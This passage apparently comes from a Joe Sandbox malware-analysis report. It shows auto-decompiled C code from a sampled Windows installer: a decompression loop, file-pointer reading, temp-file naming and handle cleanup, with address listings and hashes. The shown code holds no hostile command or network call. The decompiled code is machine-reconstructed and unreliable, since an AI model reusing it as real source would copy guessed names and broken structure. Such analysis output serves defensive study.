                            							_v100 = _v100 + 1;
                            							_v108 = _v108 + 1;
                            							_v104 = _v104 - 1;
                            							 *_v108 = __al;
                            							__ecx = _v24;
                            							 *(_v12 + __ecx) = __al;
                            							__eax = __ecx + 1;
                            							__edx = 0;
                            							_t197 = __eax % _v120;
                            							__eax = __eax / _v120;
                            							__edx = _t197;
                            							goto L82;
                            						case 0x1b:
                            							L78:
                            							__eflags = _v104;
                            							if(_v104 == 0) {
                            								_v140 = 0x1b;
                            								goto L173;
                            							}
                            							__eax = _v24;
                            							__eax = _v24 - _v48;
                            							__eflags = __eax - _v120;
                            							if(__eax >= _v120) {
                            								__eax = __eax + _v120;
                            								__eflags = __eax;
                            							}
                            							__edx = _v12;
                            							__cl =  *(__edx + __eax);
                            							__eax = _v24;
                            							_v96 = __cl;
                            							 *(__edx + __eax) = __cl;
                            							__eax = __eax + 1;
                            							__edx = 0;
                            							_t280 = __eax % _v120;
                            							__eax = __eax / _v120;
                            							__edx = _t280;
                            							__eax = _v108;
                            							_v100 = _v100 + 1;
                            							_v108 = _v108 + 1;
                            							_t289 =  &_v104;
                            							 *_t289 = _v104 - 1;
                            							__eflags =  *_t289;
                            							 *_v108 = __cl;
                            							L82:
                            							_v24 = __edx;
                            							goto L83;
                            						case 0x1c:
                            							while(1) {
                            								L126:
                            								__eflags = _v104;
                            								if(_v104 == 0) {
                            									break;
                            								}
                            								__eax = _v24;
                            								__eax = _v24 - _v48;
                            								__eflags = __eax - _v120;
                            								if(__eax >= _v120) {
                            									__eax = __eax + _v120;
                            									__eflags = __eax;
                            								}
                            								__edx = _v12;
                            								__cl =  *(__edx + __eax);
                            								__eax = _v24;
                            								_v96 = __cl;
                            								 *(__edx + __eax) = __cl;
                            								__eax = __eax + 1;
                            								__edx = 0;
                            								_t420 = __eax % _v120;
                            								__eax = __eax / _v120;
                            								__edx = _t420;
                            								__eax = _v108;
                            								_v108 = _v108 + 1;
                            								_v104 = _v104 - 1;
                            								_v52 = _v52 - 1;
                            								__eflags = _v52;
                            								 *_v108 = __cl;
                            								_v24 = _t420;
                            								if(_v52 > 0) {
                            									continue;
                            								} else {
                            									L83:
                            									_v140 = 2;
                            									goto L3;
                            								}
                            							}
                            							_v140 = 0x1c;
                            							L173:
                            							_push(0x22);
                            							_pop(_t574);
                            							memcpy(_v148,  &_v140, _t574 << 2);
                            							return 0;
                            					}
                            				}
                            				L174:
                            				_t538 = _t537 | 0xffffffff;
                            				return _t538;
                            			}

                            0x004073e2
                            0x004073f1
                            0x004073f5
                            0x004073f5
                            0x00407413
                            0x0040741a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040741c
                            0x0040741c
                            0x00407420
                            0x004075cf
                            0x00000000
                            0x004075cf
                            0x0040742c
                            0x00407433
                            0x0040743b
                            0x0040743b
                            0x0040743b
                            0x0040743e
                            0x00407441
                            0x00407441
                            0x00000000
                            0x00000000
                            0x00406d5f
                            0x00406d61
                            0x00406d64
                            0x00406dd5
                            0x00406dd8
                            0x00406ddb
                            0x00406de2
                            0x00406dec
                            0x00000000
                            0x00406dec
                            0x00406d66
                            0x00406d6a
                            0x00406d6d
                            0x00406d6f
                            0x00406d72
                            0x00406d75
                            0x00406d77
                            0x00406d7a
                            0x00406d7c
                            0x00406d81
                            0x00406d84
                            0x00406d87
                            0x00406d8b
                            0x00406d92
                            0x00406d95
                            0x00406d9c
                            0x00406da0
                            0x00406da8
                            0x00406da8
                            0x00406da8
                            0x00406da2
                            0x00406da2
                            0x00406da2
                            0x00406d97
                            0x00406d97
                            0x00406d97
                            0x00406dac
                            0x00406daf
                            0x00406dcd
                            0x00406dcf
                            0x00000000
                            0x00406dcf
                            0x00406db1
                            0x00406db4
                            0x00406db7
                            0x00406dba
                            0x00406dbc
                            0x00406dbc
                            0x00406dbc
                            0x00406dbf
                            0x00406dc2
                            0x00406dc4
                            0x00406dc5
                            0x00406dc8
                            0x00000000
                            0x00000000
                            0x00406ffe
                            0x00407002
                            0x00407020
                            0x00407023
                            0x0040702a
                            0x0040702d
                            0x00407030
                            0x00407033
                            0x00407036
                            0x00407039
                            0x0040703b
                            0x00407042
                            0x00407043
                            0x00407045
                            0x00407048
                            0x0040704b
                            0x0040704e
                            0x0040704e
                            0x00407053
                            0x00000000
                            0x00407053
                            0x00407004
                            0x00407007
                            0x0040700a
                            0x00407014
                            0x00000000
                            0x00000000
                            0x00407068
                            0x0040706c
                            0x0040708f
                            0x00407092
                            0x00407095
                            0x0040709f
                            0x0040706e
                            0x0040706e
                            0x00407071
                            0x00407074
                            0x00407077
                            0x00407084
                            0x00407087
                            0x00407087
                            0x00000000
                            0x00000000
                            0x004070ab
                            0x004070af
                            0x00000000
                            0x00000000
                            0x004070b5
                            0x004070b9
                            0x00000000
                            0x00000000
                            0x004070bf
                            0x004070c1
                            0x004070c5
                            0x004070c5
                            0x004070c8
                            0x004070cc
                            0x00000000
                            0x00000000
                            0x0040711c
                            0x00407120
                            0x00407127
                            0x0040712a
                            0x0040712d
                            0x00407137
                            0x00000000
                            0x00407137
                            0x00407122
                            0x00000000
                            0x00000000
                            0x00407143
                            0x00407147
                            0x0040714e
                            0x00407151
                            0x00407154
                            0x00407149
                            0x00407149
                            0x00407149
                            0x00407157
                            0x0040715a
                            0x0040715d
                            0x0040715d
                            0x00407160
                            0x00407163
                            0x00407166
                            0x00407166
                            0x00407169
                            0x00407170
                            0x00407175
                            0x00000000
                            0x00000000
                            0x00407203
                            0x00407203
                            0x00407207
                            0x004075a5
                            0x00000000
                            0x004075a5
                            0x0040720d
                            0x00407210
                            0x00407213
                            0x00407217
                            0x0040721a
                            0x00407220
                            0x00407222
                            0x00407222
                            0x00407222
                            0x00407225
                            0x00407228
                            0x00000000
                            0x00000000
                            0x00406df8
                            0x00406df8
                            0x00406dfc
                            0x00407569
                            0x00000000
                            0x00407569
                            0x00406e02
                            0x00406e05
                            0x00406e08
                            0x00406e0c
                            0x00406e0f
                            0x00406e15
                            0x00406e17
                            0x00406e17
                            0x00406e17
                            0x00406e1a
                            0x00406e1d
                            0x00406e1d
                            0x00406e20
                            0x00406e23
                            0x00000000
                            0x00000000
                            0x00406e29
                            0x00406e2f
                            0x00000000
                            0x00000000
                            0x00406e35
                            0x00406e35
                            0x00406e39
                            0x00406e3c
                            0x00406e3f
                            0x00406e42
                            0x00406e45
                            0x00406e46
                            0x00406e49
                            0x00406e4b
                            0x00406e51
                            0x00406e54
                            0x00406e57
                            0x00406e5a
                            0x00406e5d
                            0x00406e60
                            0x00406e63
                            0x00406e7f
                            0x00406e82
                            0x00406e85
                            0x00406e88
                            0x00406e8f
                            0x00406e93
                            0x00406e95
                            0x00406e99
                            0x00406e65
                            0x00406e65
                            0x00406e69
                            0x00406e71
                            0x00406e76
                            0x00406e78
                            0x00406e7a
                            0x00406e7a
                            0x00406e9c
                            0x00406ea3
                            0x00406ea6
                            0x00000000
                            0x00406eac
                            0x00000000
                            0x00406eac
                            0x00000000
                            0x00406eb1
                            0x00406eb1
                            0x00406eb5
                            0x00407575
                            0x00000000
                            0x00407575
                            0x00406ebb
                            0x00406ebe
                            0x00406ec1
                            0x00406ec5
                            0x00406ec8
                            0x00406ece
                            0x00406ed0
                            0x00406ed0
                            0x00406ed0
                            0x00406ed3
                            0x00406ed6
                            0x00406ed6
                            0x00406ed6
                            0x00406edc
                            0x00000000
                            0x00000000
                            0x00406ede
                            0x00406ee1
                            0x00406ee4
                            0x00406ee7
                            0x00406eea
                            0x00406eed
                            0x00406ef0
                            0x00406ef3
                            0x00406ef6
                            0x00406ef9
                            0x00406efc
                            0x00406f14
                            0x00406f17
                            0x00406f1a
                            0x00406f1d
                            0x00406f1d
                            0x00406f20
                            0x00406f24
                            0x00406f26
                            0x00406efe
                            0x00406efe
                            0x00406f06
                            0x00406f0b
                            0x00406f0d
                            0x00406f0f
                            0x00406f0f
                            0x00406f29
                            0x00406f30
                            0x00406f33
                            0x00000000
                            0x00406f35
                            0x00000000
                            0x00406f35
                            0x00406f33
                            0x00406f3a
                            0x00406f3a
                            0x00406f3a
                            0x00406f3a
                            0x00000000
                            0x00000000
                            0x00406f75
                            0x00406f75
                            0x00406f79
                            0x00407581
                            0x00000000
                            0x00407581
                            0x00406f7f
                            0x00406f82
                            0x00406f85
                            0x00406f89
                            0x00406f8c
                            0x00406f92
                            0x00406f94
                            0x00406f94
                            0x00406f94
                            0x00406f97
                            0x00406f9a
                            0x00406f9a
                            0x00406fa0
                            0x00406f3e
                            0x00406f3e
                            0x00406f41
                            0x00000000
                            0x00406f41
                            0x00406fa2
                            0x00406fa2
                            0x00406fa5
                            0x00406fa8
                            0x00406fab
                            0x00406fae
                            0x00406fb1
                            0x00406fb4
                            0x00406fb7
                            0x00406fba
                            0x00406fbd
                            0x00406fc0
                            0x00406fd8
                            0x00406fdb
                            0x00406fde
                            0x00406fe1
                            0x00406fe1
                            0x00406fe4
                            0x00406fe8
                            0x00406fea
                            0x00406fc2
                            0x00406fc2
                            0x00406fca
                            0x00406fcf
                            0x00406fd1
                            0x00406fd3
                            0x00406fd3
                            0x00406fed
                            0x00406ff4
                            0x00406ff7
                            0x00000000
                            0x00406ff9
                            0x00000000
                            0x00406ff9
                            0x00000000
                            0x00407286
                            0x00407286
                            0x0040728a
                            0x004075b1
                            0x00000000
                            0x004075b1
                            0x00407290
                            0x00407293
                            0x00407296
                            0x0040729a
                            0x0040729d
                            0x004072a3
                            0x004072a5
                            0x004072a5
                            0x004072a5
                            0x004072a8
                            0x00000000
                            0x00000000
                            0x00407056
                            0x00407056
                            0x00407059
                            0x00000000
                            0x00000000
                            0x00407395
                            0x00407399
                            0x004073bb
                            0x004073be
                            0x004073c8
                            0x004073cb
                            0x004073cb
                            0x00000000
                            0x004073cb
                            0x0040739b
                            0x0040739e
                            0x004073a2
                            0x004073a5
                            0x004073a5
                            0x004073a8
                            0x00000000
                            0x00000000
                            0x00407452
                            0x00407456
                            0x00407474
                            0x00407474
                            0x00407474
                            0x0040747b
                            0x00407482
                            0x00407489
                            0x00407489
                            0x00000000
                            0x00407489
                            0x00407458
                            0x0040745b
                            0x0040745e
                            0x00407461
                            0x00407468
                            0x004073ac
                            0x004073ac
                            0x004073af
                            0x00000000
                            0x00000000
                            0x00407543
                            0x00407546
                            0x00000000
                            0x00000000
                            0x0040717d
                            0x0040717f
                            0x00407186
                            0x00407187
                            0x00407189
                            0x0040718c
                            0x00000000
                            0x00000000
                            0x00407194
                            0x00407197
                            0x0040719a
                            0x0040719c
                            0x0040719e
                            0x0040719e
                            0x0040719f
                            0x004071a2
                            0x004071a9
                            0x004071ac
                            0x004071ba
                            0x00000000
                            0x00000000
                            0x00407490
                            0x00407490
                            0x00407493
                            0x0040749a
                            0x00000000
                            0x00000000
                            0x0040749f
                            0x0040749f
                            0x004074a3
                            0x004075db
                            0x00000000
                            0x004075db
                            0x004074a9
                            0x004074ac
                            0x004074af
                            0x004074b3
                            0x004074b6
                            0x004074bc
                            0x004074be
                            0x004074be
                            0x004074be
                            0x004074c1
                            0x004074c4
                            0x004074c4
                            0x004074c4
                            0x004074c4
                            0x004074c7
                            0x004074c7
                            0x004074cb
                            0x0040752b
                            0x0040752e
                            0x00407533
                            0x00407534
                            0x00407536
                            0x00407538
                            0x0040753b
                            0x00407447
                            0x00407447
                            0x00000000
                            0x00407447
                            0x004074cd
                            0x004074d3
                            0x004074d6
                            0x004074d9
                            0x004074dc
                            0x004074df
                            0x004074e2
                            0x004074e5
                            0x004074e8
                            0x004074eb
                            0x004074ee
                            0x00407507
                            0x0040750a
                            0x0040750d
                            0x00407510
                            0x00407514
                            0x00407516
                            0x00407516
                            0x00407517
                            0x0040751a
                            0x004074f0
                            0x004074f0
                            0x004074f8
                            0x004074fd
                            0x004074ff
                            0x00407502
                            0x00407502
                            0x0040751d
                            0x00407524
                            0x00000000
                            0x00407526
                            0x00000000
                            0x00407526
                            0x00000000
                            0x004071c2
                            0x004071c5
                            0x004071fb
                            0x0040732b
                            0x0040732b
                            0x0040732b
                            0x0040732b
                            0x0040732e
                            0x0040732e
                            0x00407331
                            0x00407333
                            0x004075bd
                            0x00000000
                            0x004075bd
                            0x00407339
                            0x0040733c
                            0x00000000
                            0x00000000
                            0x00407342
                            0x00407346
                            0x00407349
                            0x00407349
                            0x00407349
                            0x00000000
                            0x00407349
                            0x004071c7
                            0x004071c9
                            0x004071cb
                            0x004071cd
                            0x004071d0
                            0x004071d1
                            0x004071d3
                            0x004071d5
                            0x004071d8
                            0x004071db
                            0x004071f1
                            0x004071f6
                            0x0040722e
                            0x0040722e
                            0x00407232
                            0x0040725e
                            0x00407260
                            0x00407267
                            0x0040726a
                            0x0040726d
                            0x0040726d
                            0x00407272
                            0x00407272
                            0x00407274
                            0x00407277
                            0x0040727e
                            0x00407281
                            0x004072ae
                            0x004072ae
                            0x004072b1
                            0x004072b4
                            0x00407328
                            0x00407328
                            0x00407328
                            0x00000000
                            0x00407328
                            0x004072b6
                            0x004072bc
                            0x004072bf
                            0x004072c2
                            0x004072c5
                            0x004072c8
                            0x004072cb
                            0x004072ce
                            0x004072d1
                            0x004072d4
                            0x004072d7
                            0x004072f0
                            0x004072f2
                            0x004072f5
                            0x004072f6
                            0x004072f9
                            0x004072fb
                            0x004072fe
                            0x00407300
                            0x00407302
                            0x00407305
                            0x00407307
                            0x0040730a
                            0x0040730e
                            0x00407310
                            0x00407310
                            0x00407311
                            0x00407314
                            0x00407317
                            0x004072d9
                            0x004072d9
                            0x004072e1
                            0x004072e6
                            0x004072e8
                            0x004072eb
                            0x004072eb
                            0x0040731a
                            0x00407321
                            0x004072ab
                            0x004072ab
                            0x004072ab
                            0x004072ab
                            0x00000000
                            0x00407323
                            0x00000000
                            0x00407323
                            0x00407321
                            0x00407234
                            0x00407237
                            0x00407239
                            0x0040723c
                            0x0040723f
                            0x00407242
                            0x00407244
                            0x00407247
                            0x0040724a
                            0x0040724a
                            0x0040724d
                            0x0040724d
                            0x00407250
                            0x00407257
                            0x0040722b
                            0x0040722b
                            0x0040722b
                            0x0040722b
                            0x00000000
                            0x00407259
                            0x00000000
                            0x00407259
                            0x00407257
                            0x004071dd
                            0x004071e0
                            0x004071e2
                            0x004071e5
                            0x00000000
                            0x00000000
                            0x00406f44
                            0x00406f44
                            0x00406f48
                            0x0040758d
                            0x00000000
                            0x0040758d
                            0x00406f4e
                            0x00406f51
                            0x00406f54
                            0x00406f57
                            0x00406f5a
                            0x00406f5d
                            0x00406f60
                            0x00406f62
                            0x00406f65
                            0x00406f68
                            0x00406f6b
                            0x00406f6d
                            0x00406f6d
                            0x00406f6d
                            0x00000000
                            0x00000000
                            0x004070cf
                            0x004070cf
                            0x004070d3
                            0x00407599
                            0x00000000
                            0x00407599
                            0x004070d9
                            0x004070dc
                            0x004070df
                            0x004070e2
                            0x004070e4
                            0x004070e4
                            0x004070e4
                            0x004070e7
                            0x004070ea
                            0x004070ed
                            0x004070f0

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID:
                            • String ID: ndidateListW
                            • API String ID: 0-425658952
                            • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                            • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                            • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                            • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 579 403479-4034a1 GetTickCount 580 4035d1-4035d9 call 40302e 579->580 581 4034a7-4034d2 call 4035f8 SetFilePointer 579->581 586 4035db-4035df 580->586 587 4034d7-4034e9 581->587 588 4034eb 587->588 589 4034ed-4034fb call 4035e2 587->589 588->589 592 403501-40350d 589->592 593 4035c3-4035c6 589->593 594 403513-403519 592->594 593->586 595 403544-403560 call 406bb0 594->595 596 40351b-403521 594->596 602 403562-40356a 595->602 603 4035cc 595->603 596->595 597 403523-403543 call 40302e 596->597 597->595 605 40356c-403574 call 40620a 602->605 606 40358d-403593 602->606 604 4035ce-4035cf 603->604 604->586 610 403579-40357b 605->610 606->603 607 403595-403597 606->607 607->603 609 403599-4035ac 607->609 609->587 611 4035b2-4035c1 SetFilePointer 609->611 612 4035c8-4035ca 610->612 613 40357d-403589 610->613 611->580 612->604 613->594 614 40358b 613->614 614->609
                            C-Code - Quality: 93%
                            			E00403479(intOrPtr _a4) {
                            				intOrPtr _t11;
                            				signed int _t12;
                            				void* _t14;
                            				void* _t15;
                            				long _t16;
                            				void* _t18;
                            				intOrPtr _t31;
                            				intOrPtr _t34;
                            				intOrPtr _t36;
                            				void* _t37;
                            				intOrPtr _t49;
                            
                            				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
                            				 *0x42a26c = GetTickCount() + 0x1f4;
                            				if(_t34 <= 0) {
                            					L22:
                            					E0040302E(1);
                            					return 0;
                            				}
                            				E004035F8( *0x420f04);
                            				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
                            				 *0x420f00 = _t34;
                            				 *0x420ef0 = 0;
                            				while(1) {
                            					_t31 = 0x4000;
                            					_t11 =  *0x420ef8 -  *0x420f04;
                            					if(_t11 <= 0x4000) {
                            						_t31 = _t11;
                            					}
                            					_t12 = E004035E2(0x414ef0, _t31);
                            					if(_t12 == 0) {
                            						break;
                            					}
                            					 *0x420f04 =  *0x420f04 + _t31;
                            					 *0x40ce80 = 0x414ef0;
                            					 *0x40ce84 = _t31;
                            					L6:
                            					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
                            						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
                            						E0040302E(0);
                            					}
                            					 *0x40ce88 = 0x40cef0;
                            					 *0x40ce8c = 0x8000; // executed
                            					_t14 = E00406BB0(0x40ce68); // executed
                            					if(_t14 < 0) {
                            						goto L20;
                            					}
                            					_t36 =  *0x40ce88; // 0x40fb8e
                            					_t37 = _t36 - 0x40cef0;
                            					if(_t37 == 0) {
                            						__eflags =  *0x40ce84; // 0x0
                            						if(__eflags != 0) {
                            							goto L20;
                            						}
                            						__eflags = _t31;
                            						if(_t31 == 0) {
                            							goto L20;
                            						}
                            						L16:
                            						_t16 =  *0x420ef4;
                            						if(_t16 -  *0x40ce60 + _a4 > 0) {
                            							continue;
                            						}
                            						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
                            						goto L22;
                            					}
                            					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
                            					if(_t18 == 0) {
                            						_push(0xfffffffe);
                            						L21:
                            						_pop(_t15);
                            						return _t15;
                            					}
                            					 *0x40ce60 =  *0x40ce60 + _t37;
                            					_t49 =  *0x40ce84; // 0x0
                            					if(_t49 != 0) {
                            						goto L6;
                            					}
                            					goto L16;
                            					L20:
                            					_push(0xfffffffd);
                            					goto L21;
                            				}
                            				return _t12 | 0xffffffff;
                            			}















                            APIs
                            • GetTickCount.KERNEL32 ref: 0040348D
                              • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                            • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                            • SetFilePointer.KERNELBASE(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: FilePointer$CountTick
                            • String ID: ndidateListW
                            • API String ID: 1092082344-425658952
                            • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                            • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                            • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                            • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 615 406187-406193 616 406194-4061c8 GetTickCount GetTempFileNameW 615->616 617 4061d7-4061d9 616->617 618 4061ca-4061cc 616->618 620 4061d1-4061d4 617->620 618->616 619 4061ce 618->619 619->620
                            C-Code - Quality: 100%
                            			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                            				intOrPtr _v8;
                            				short _v12;
                            				short _t12;
                            				intOrPtr _t13;
                            				signed int _t14;
                            				WCHAR* _t17;
                            				signed int _t19;
                            				signed short _t23;
                            				WCHAR* _t26;
                            
                            				_t26 = _a4;
                            				_t23 = 0x64;
                            				while(1) {
                            					_t12 =  *L"nsa"; // 0x73006e
                            					_t23 = _t23 - 1;
                            					_v12 = _t12;
                            					_t13 =  *0x40a5ac; // 0x61
                            					_v8 = _t13;
                            					_t14 = GetTickCount();
                            					_t19 = 0x1a;
                            					_v8 = _v8 + _t14 % _t19;
                            					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                            					if(_t17 != 0) {
                            						break;
                            					}
                            					if(_t23 != 0) {
                            						continue;
                            					} else {
                            						 *_t26 =  *_t26 & _t23;
                            					}
                            					L4:
                            					return _t17;
                            				}
                            				_t17 = _t26;
                            				goto L4;
                            			}













                            APIs
                            • GetTickCount.KERNEL32 ref: 004061A5
                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: CountFileNameTempTick
                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                            • API String ID: 1716503409-44229769
                            • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                            • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                            • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                            • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 621 403c25-403c34 622 403c40-403c48 621->622 623 403c36-403c39 CloseHandle 621->623 624 403c54-403c60 call 403c82 call 405d74 622->624 625 403c4a-403c4d CloseHandle 622->625 623->622 629 403c65-403c66 624->629 625->624
                            C-Code - Quality: 100%
                            			E00403C25() {
                            				void* _t1;
                            				void* _t2;
                            				void* _t4;
                            				signed int _t11;
                            
                            				_t1 =  *0x40a018; // 0xffffffff
                            				if(_t1 != 0xffffffff) {
                            					CloseHandle(_t1);
                            					 *0x40a018 =  *0x40a018 | 0xffffffff;
                            				}
                            				_t2 =  *0x40a01c; // 0xffffffff
                            				if(_t2 != 0xffffffff) {
                            					CloseHandle(_t2);
                            					 *0x40a01c =  *0x40a01c | 0xffffffff;
                            					_t11 =  *0x40a01c;
                            				}
                            				E00403C82();
                            				_t4 = E00405D74(_t11, L"C:\\Users\\alfons\\AppData\\Local\\Temp\\nsjD2C5.tmp\\", 7); // executed
                            				return _t4;
                            			}








                            APIs
                            • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                            • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                            Strings
                            • C:\Users\user\AppData\Local\Temp\nsjD2C5.tmp\, xrefs: 00403C5B
                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: CloseHandle
                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsjD2C5.tmp\
                            • API String ID: 2962429428-3044992453
                            • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                            • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                            • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                            • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
